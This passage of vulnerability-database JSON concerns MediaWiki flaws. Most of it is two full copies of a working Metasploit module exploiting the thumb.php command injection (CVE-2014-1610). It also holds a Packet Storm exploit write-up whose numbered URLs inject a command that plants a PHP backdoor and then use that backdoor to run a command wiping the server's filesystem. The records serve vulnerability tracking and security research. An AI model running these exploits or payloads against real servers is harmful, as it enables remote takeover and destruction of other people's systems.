"MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2014-04-29T18:55:00", "id": "DEBIANCVE:CVE-2014-2853", "href": "https://security-tracker.debian.org/tracker/CVE-2014-2853", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via a -o-link attribute.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "debiancve", "title": "CVE-2013-6454", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6454"], "modified": "2014-05-12T14:55:00", "id": "DEBIANCVE:CVE-2013-6454", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6454", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-08-02T18:25:39", "description": "A remote code execution vulnerability has been reported in MediaWiki. The vulnerability is due to improper validation of user data. 
A remote attacker can exploit this vulnerability by sending a specially crafted HTTP request to the target.", "cvss3": {}, "published": "2014-01-26T00:00:00", "type": "checkpoint_advisories", "title": "MediaWiki Input Validation Remote Code Execution (CVE-2014-1610)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2015-06-10T00:00:00", "id": "CPAI-2014-0764", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T09:48:52", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote unauthenticated users to execute arbitrary commands via shell metacharacters. 
If no target file is specified this module will attempt to log in with the provided credentials to upload a file (.DjVu) to use for exploitation.\n", "cvss3": {}, "published": "2014-02-07T20:37:44", "type": "metasploit", "title": "MediaWiki Thumb.php Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2022-03-21T12:47:39", "id": "MSF:EXPLOIT-MULTI-HTTP-MEDIAWIKI_THUMB-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/mediawiki_thumb/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\n 'Description' => %q{\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\n users to execute arbitrary commands via shell metacharacters. 
If no target file\n is specified this module will attempt to log in with the provided credentials to\n upload a file (.DjVu) to use for exploitation.\n },\n 'Author' =>\n [\n 'Netanel Rubin', # from Check Point - Discovery\n 'Brandon Perry', # Metasploit Module\n 'Ben Harris', # Metasploit Module\n 'Ben Campbell' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-1610' ],\n [ 'OSVDB', '102630'],\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Automatic PHP-CLI',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\\r\\n\",\n 'PrependEncoder' => \"php -r \\\"\",\n 'AppendEncoder' => \"\\\"\"\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP\n }\n ],\n [ 'Linux CMD',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl python php',\n }\n },\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD\n }\n ],\n [ 'Windows CMD',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl',\n }\n },\n 'Platform' => ['win'],\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2014-01-28'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\n ])\n end\n\n def get_version(body)\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\n\n unless meta_generator\n vprint_status(\"No META Generator tag on #{full_uri}.\")\n return nil, nil, nil\n end\n\n if meta_generator && meta_generator =~ 
/mediawiki/i\n vprint_status(\"#{meta_generator} detected.\")\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\n major = $1.to_i\n minor = $2.to_i\n patch = $3.to_i\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\n\n return major, minor, patch\n end\n\n return nil, nil, nil\n end\n\n def check\n uri = target_uri.path\n\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\n\n response = send_request_cgi!(opts)\n\n if opts['redirect_uri']\n vprint_status(\"Redirected to #{opts['redirect_uri']}.\")\n end\n\n unless response\n vprint_status(\"No response from #{full_uri}.\")\n return CheckCode::Unknown\n end\n\n # Mediawiki will give a 404 for unknown pages but still have a body\n if response.code == 200 || response.code == 404\n vprint_status(\"#{response.code} response received...\")\n\n major, minor, patch = get_version(response.body)\n\n unless major\n return CheckCode::Unknown\n end\n\n if major == 1 && (minor < 8 || minor > 22)\n return CheckCode::Safe\n elsif major == 1 && (minor == 22 && patch > 1)\n return CheckCode::Safe\n elsif major == 1 && (minor == 21 && patch > 4)\n return CheckCode::Safe\n elsif major == 1 && (minor == 19 && patch > 10)\n return CheckCode::Safe\n elsif major == 1\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\n CheckCode::Unknown\n end\n\n def exploit\n uri = target_uri.path\n\n print_status(\"Grabbing version and login CSRF token...\")\n response = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'vars_get' => { 'title' => 'Special:UserLogin' }\n })\n\n unless response\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\n end\n\n server = response['Server']\n if server && target.name =~ /automatic/i && server =~ /win32/i\n vprint_status(\"Windows platform detected: #{server}.\")\n my_platform = Msf::Module::Platform::Windows\n elsif server && target.name =~ /automatic/i\n 
vprint_status(\"Nix platform detected: #{server}.\")\n my_platform = Msf::Module::Platform::Unix\n else\n my_platform = target.platform.platforms.first\n end\n\n # If we have already identified a DjVu/PDF file on the server trigger\n # the exploit\n unless datastore['FILENAME'].blank?\n payload_request(uri, datastore['FILENAME'], my_platform)\n return\n end\n\n username = datastore['USERNAME']\n password = datastore['PASSWORD']\n\n major, minor, patch = get_version(response.body)\n\n # Upload CSRF added in v1.18.2\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\n upload_csrf = false\n elsif ((major == 1) && (minor < 18))\n upload_csrf = false\n else\n upload_csrf = true\n end\n\n session_cookie = response.get_cookies\n\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\n\n if wp_login_token.blank?\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\")\n else\n print_good(\"Retrieved login CSRF token.\")\n end\n\n print_status(\"Attempting to login...\")\n login = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'POST',\n 'vars_get' => {\n 'title' => 'Special:UserLogin',\n 'action' => 'submitlogin',\n 'type' => 'login'\n },\n 'cookie' => session_cookie,\n 'vars_post' => {\n 'wpName' => username,\n 'wpPassword' => password,\n 'wpLoginAttempt' => 'Log in',\n 'wpLoginToken' => wp_login_token\n }\n })\n\n if login and login.code == 302\n print_good(\"Log in successful.\")\n else\n fail_with(Failure::NoAccess, \"Failed to log in.\")\n end\n\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\n\n # Testing v1.15.1 it looks like it has session fixation\n # vulnerability so we dont get a new session cookie after\n # authenticating. Therefore we need to include our old cookie.\n unless auth_cookie.include? 
'session='\n auth_cookie << session_cookie\n end\n\n print_status(\"Getting upload CSRF token...\") if upload_csrf\n upload_file = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\n 'cookie' => auth_cookie\n })\n\n unless upload_file and upload_file.code == 200\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\n end\n\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\n\n if upload_csrf && wp_edit_token.blank?\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\")\n elsif upload_csrf\n print_good(\"Retrieved upload CSRF token.\")\n end\n\n upload_mime = Rex::MIME::Message.new\n\n djvu_file = ::File.binread(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\n file_name = \"#{rand_text_alpha(4)}.djvu\"\n\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\n upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\n post_data = upload_mime.to_s\n\n print_status(\"Uploading DjVu file #{file_name}...\")\n\n 
upload = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\n 'data' => post_data,\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\n 'cookie' => auth_cookie\n })\n\n if upload and upload.code == 302 and upload.headers['Location']\n location = upload.headers['Location']\n print_good(\"File uploaded to #{location}\")\n else\n if upload.body.include? 'not a permitted file type'\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\n else\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\n end\n end\n\n payload_request(uri, file_name, my_platform)\n end\n\n def payload_request(uri, file_name, my_platform)\n if my_platform == Msf::Module::Platform::Windows\n trigger = \"1)&(#{payload.encoded})&\"\n else\n trigger = \"1;#{payload.encoded};\"\n end\n\n vars_get = { 'f' => file_name }\n if file_name.include? '.pdf'\n vars_get['width'] = trigger\n elsif file_name.include? '.djvu'\n vars_get['width'] = 1\n vars_get['p'] = trigger\n else\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\n end\n\n print_status(\"Sending payload request...\")\n r = send_request_cgi({\n 'uri' => normalize_uri(uri, 'thumb.php'),\n 'vars_get' => vars_get\n }, 1)\n\n if r && r.code == 404 && r.body =~ /not exist/\n print_error(\"File: #{file_name} does not exist.\")\n elsif r\n print_error(\"Received response #{r.code}, exploit probably failed\")\n end\n end\n\n # The order of name, value keeps shifting so regex is painful.\n # Cant use nokogiri due to security issues\n # Cant use REXML directly as its not strict XHTML\n # So we do a filthy mixture of regex and REXML\n def get_html_value(html, type, name, value)\n return nil unless html\n return nil unless type\n return nil unless name\n return nil unless value\n\n found = nil\n html.each_line do |line|\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\n found = $&\n break\n end\n end\n\n if found\n 
doc = REXML::Document.new found\n return doc.root.attributes[value]\n end\n\n ''\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/mediawiki_thumb.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:12", "description": "", "cvss3": {}, "published": "2014-02-19T00:00:00", "type": "packetstorm", "title": "MediaWiki Thumb.php Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-19T00:00:00", "id": "PACKETSTORM:125287", "href": "https://packetstormsecurity.com/files/125287/MediaWiki-Thumb.php-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MediaWiki Thumb.php Remote Command Execution', \n'Description' => %q{ \nMediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, \nwhen DjVu or PDF file upload support is enabled, allows remote unauthenticated \nusers to execute arbitrary commands via shell metacharacters. If no target file \nis specified this module will attempt to log in with the provided credentials to \nupload a file (.DjVu) to use for exploitation. 
\n}, \n'Author' => \n[ \n'Netanel Rubin', # from Check Point - Discovery \n'Brandon Perry', # Metasploit Module \n'Ben Harris', # Metasploit Module \n'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-1610' ], \n[ 'OSVDB', '102630'], \n[ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ], \n[ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ] \n], \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Automatic PHP-CLI', \n{ \n'Payload' => \n{ \n'BadChars' => \"\\r\\n\", \n'PrependEncoder' => \"php -r \\\"\", \n'AppendEncoder' => \"\\\"\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP \n} \n], \n[ 'Linux CMD', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl python php', \n} \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD \n} \n], \n[ 'Windows CMD', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl', \n} \n}, \n'Platform' => ['win'], \n'Arch' => ARCH_CMD \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 28 2014')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]), \nOptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]), \nOptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]), \nOptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ]) \n], self.class) \nend \n \ndef get_version(body) \nmeta_generator = get_html_value(body, 'meta', 'generator', 'content') \n \nunless meta_generator \nvprint_status(\"No META Generator tag on #{full_uri}.\") \nreturn nil, nil, nil \nend \n \nif meta_generator && meta_generator =~ /mediawiki/i \nvprint_status(\"#{meta_generator} detected.\") \nmeta_generator =~ 
/(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/ \nmajor = $1.to_i \nminor = $2.to_i \npatch = $3.to_i \nvprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\") \n \nreturn major, minor, patch \nend \n \nreturn nil, nil, nil \nend \n \ndef check \nuri = target_uri.path \n \nopts = { 'uri' => normalize_uri(uri, 'index.php') } \n \nresponse = send_request_cgi!(opts) \n \nif opts['redirect_uri'] \nvprint_status(\"Redirected to #{opts['redirect_uri']}.\") \nend \n \nunless response \nvprint_status(\"No response from #{full_uri}.\") \nreturn CheckCode::Unknown \nend \n \n# Mediawiki will give a 404 for unknown pages but still have a body \nif response.code == 200 || response.code == 404 \nvprint_status(\"#{response.code} response received...\") \n \nmajor, minor, patch = get_version(response.body) \n \nunless major \nreturn CheckCode::Unknown \nend \n \nif major == 1 && (minor < 8 || minor > 22) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 22 && patch > 1) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 21 && patch > 4) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 19 && patch > 10) \nreturn CheckCode::Safe \nelsif major == 1 \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nvprint_status(\"Received response code #{response.code} from #{full_uri}\") \nCheckCode::Unknown \nend \n \ndef exploit \nuri = target_uri.path \n \nprint_status(\"Grabbing version and login CSRF token...\") \nresponse = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'vars_get' => { 'title' => 'Special:UserLogin' } \n}) \n \nunless response \nfail_with(Failure::NotFound, \"Failed to retrieve webpage.\") \nend \n \nserver = response['Server'] \nif server && target.name =~ /automatic/i && server =~ /win32/i \nvprint_status(\"Windows platform detected: #{server}.\") \nmy_platform = Msf::Module::Platform::Windows \nelsif server && target.name =~ /automatic/i \nvprint_status(\"Nix platform detected: #{server}.\") \nmy_platform = 
Msf::Module::Platform::Unix \nelse \nmy_platform = target.platform.platforms.first \nend \n \n# If we have already identified a DjVu/PDF file on the server trigger \n# the exploit \nunless datastore['FILENAME'].blank? \npayload_request(uri, datastore['FILENAME'], my_platform) \nreturn \nend \n \nusername = datastore['USERNAME'] \npassword = datastore['PASSWORD'] \n \nmajor, minor, patch = get_version(response.body) \n \n# Upload CSRF added in v1.18.2 \n# http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1 \nif ((major == 1) && (minor == 18) && (patch == 0 || patch == 1)) \nupload_csrf = false \nelsif ((major == 1) && (minor < 18)) \nupload_csrf = false \nelse \nupload_csrf = true \nend \n \nsession_cookie = response.get_cookies \n \nwp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value') \n \nif wp_login_token.blank? \nfail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\") \nelse \nprint_good(\"Retrieved login CSRF token.\") \nend \n \nprint_status(\"Attempting to login...\") \nlogin = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'method' => 'POST', \n'vars_get' => { \n'title' => 'Special:UserLogin', \n'action' => 'submitlogin', \n'type' => 'login' \n}, \n'cookie' => session_cookie, \n'vars_post' => { \n'wpName' => username, \n'wpPassword' => password, \n'wpLoginAttempt' => 'Log in', \n'wpLoginToken' => wp_login_token \n} \n}) \n \nif login and login.code == 302 \nprint_good(\"Log in successful.\") \nelse \nfail_with(Failure::NoAccess, \"Failed to log in.\") \nend \n \nauth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','') \n \n# Testing v1.15.1 it looks like it has session fixation \n# vulnerability so we dont get a new session cookie after \n# authenticating. Therefore we need to include our old cookie. \nunless auth_cookie.include? 
'session=' \nauth_cookie << session_cookie \nend \n \nprint_status(\"Getting upload CSRF token...\") if upload_csrf \nupload_file = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), \n'cookie' => auth_cookie \n}) \n \nunless upload_file and upload_file.code == 200 \nfail_with(Failure::NotFound, \"Failed to access file upload page.\") \nend \n \nwp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf \nwp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value') \ntitle = get_html_value(upload_file.body, 'input', 'title', 'value') \n \nif upload_csrf && wp_edit_token.blank? \nfail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\") \nelsif upload_csrf \nprint_good(\"Retrieved upload CSRF token.\") \nend \n \nupload_mime = Rex::MIME::Message.new \n \ndjvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\")) \nfile_name = \"#{rand_text_alpha(4)}.djvu\" \n \nupload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\") \nupload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\") \nupload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\") \nupload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\") \nupload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\") \nupload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf \nupload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\") \nupload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\") \nupload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\") \npost_data = upload_mime.to_s \n \nprint_status(\"Uploading DjVu file #{file_name}...\") \n 
\nupload = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), \n'data' => post_data, \n'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\", \n'cookie' => auth_cookie \n}) \n \nif upload and upload.code == 302 and upload.headers['Location'] \nlocation = upload.headers['Location'] \nprint_good(\"File uploaded to #{location}\") \nelse \nif upload.body.include? 'not a permitted file type' \nfail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\") \nelse \nfail_with(Failure::UnexpectedReply, \"Failed to upload file.\") \nend \nend \n \npayload_request(uri, file_name, my_platform) \nend \n \ndef payload_request(uri, file_name, my_platform) \nif my_platform == Msf::Module::Platform::Windows \ntrigger = \"1)&(#{payload.encoded})&\" \nelse \ntrigger = \"1;#{payload.encoded};\" \nend \n \nvars_get = { 'f' => file_name } \nif file_name.include? '.pdf' \nvars_get['width'] = trigger \nelsif file_name.include? '.djvu' \nvars_get['width'] = 1 \nvars_get['p'] = trigger \nelse \nfail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\") \nend \n \nprint_status(\"Sending payload request...\") \nr = send_request_cgi({ \n'uri' => normalize_uri(uri, 'thumb.php'), \n'vars_get' => vars_get \n}, 1) \n \nif r && r.code == 404 && r.body =~ /not exist/ \nprint_error(\"File: #{file_name} does not exist.\") \nelsif r \nprint_error(\"Received response #{r.code}, exploit probably failed.\") \nend \nend \n \n# The order of name, value keeps shifting so regex is painful. 
\n# Cant use nokogiri due to security issues \n# Cant use REXML directly as its not strict XHTML \n# So we do a filthy mixture of regex and REXML \ndef get_html_value(html, type, name, value) \nreturn nil unless html \nreturn nil unless type \nreturn nil unless name \nreturn nil unless value \n \nfound = nil \nhtml.each_line do |line| \nif line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i \nfound = $& \nbreak \nend \nend \n \nif found \ndoc = REXML::Document.new found \nreturn doc.root.attributes[value] \nend \n \n'' \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125287/mediawiki_thumb.rb.txt", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:15:32", "description": "", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "packetstorm", "title": "MediaWiki 1.22.1 PdfHandler Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-03T00:00:00", "id": "PACKETSTORM:125040", "href": "https://packetstormsecurity.com/files/125040/MediaWiki-1.22.1-PdfHandler-Remote-Code-Execution.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n#################################################################### \n# \n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit \n(CVE-2014-1610) \n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group \n(Jan 19, 2014) \n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) \n# Affected website : Wikipedia.org and more ! \n# \n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto) \n# Release dates : Feb 1, 2014 \n# Special Thanks to 2600 Thailand ! \n# \n#################################################################### \n \n# Exploit: \n#################################################################### \n1. 
upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) \nhttp://vulnerable-site/index.php/Special:Upload \n2. inject os cmd to upload a php-backdoor \nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 \n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php` \n3. access to php-backdoor! \nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root \n4. happy pwning!! \n \n \n# Related files: \n#################################################################### \nthumb.php <-- extract all _GET array to params \n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width \noptions \n/includes/media/ImageHandler.php \n/includes/GlobalFunctions.php \n/includes/filerepo/file/File.php \n \n# Vulnerability Analysis: \n#################################################################### \n1. thumb.php \nThis script used to resize images if it is configured to be done \nwhen the web browser requests the image \n<? ... \n1.1 Called directly, use $_GET params \nwfThumbHandleRequest(); \n1.2 Handle a thumbnail request via query parameters \nfunction wfThumbHandleRequest() { \n$params = get_magic_quotes_gpc() \n? array_map( 'stripslashes', $_GET ) \n: $_GET; << WTF \n \nwfStreamThumb( $params ); // stream the thumbnail \n} \n1.3 Stream a thumbnail specified by parameters \nfunction wfStreamThumb( array $params ) { \n... \n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts \nuploaded.pdf file here \n... \n// Backwards compatibility parameters \nif ( isset( $params['w'] ) ) { \n$params['width'] = $params['w']; // << Inject os cmd here! \nunset( $params['w'] ); \n} \n... \n$img = wfLocalFile( $fileName ); \n... \n// Thumbnail isn't already there, so create the new thumbnail... \n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image \nby width/height \n... \n// Stream the file if there were no errors \n$thumb->streamFile( $headers ); \n... \n?> \n2. /includes/filerepo/file/File.php \n<? ... 
\nfunction transform( $params, $flags = 0 ) { ... \n$handler = $this->getHandler(); // << PDF Handler \n... \n$normalisedParams = $params; \n$handler->normaliseParams( $this, $normalisedParams ); \n... \n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); \n.. \n?> \n3. /extensions/PdfHandler/PdfHandler_body.php \n<? ... \nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) { \n... \n$width = $params['width']; \n... \n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & \nparameters \n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} \n-dLastPage={$page}\"; \n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg( \n$srcPath ); \n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor ); \n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell \nargument \n$cmd .= wfEscapeShellArg( $dstPath ) . \")\"; \n$cmd .= \" 2>&1\"; \n... \n$err = wfShellExec( $cmd, $retval ); \n... \n?> \n4. /includes/GlobalFunctions.php \nExecute a shell command, with time and memory limits \n<? ... \nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = \narray() ) { \n... \npassthru( $cmd, $retval ); // << Execute here!! 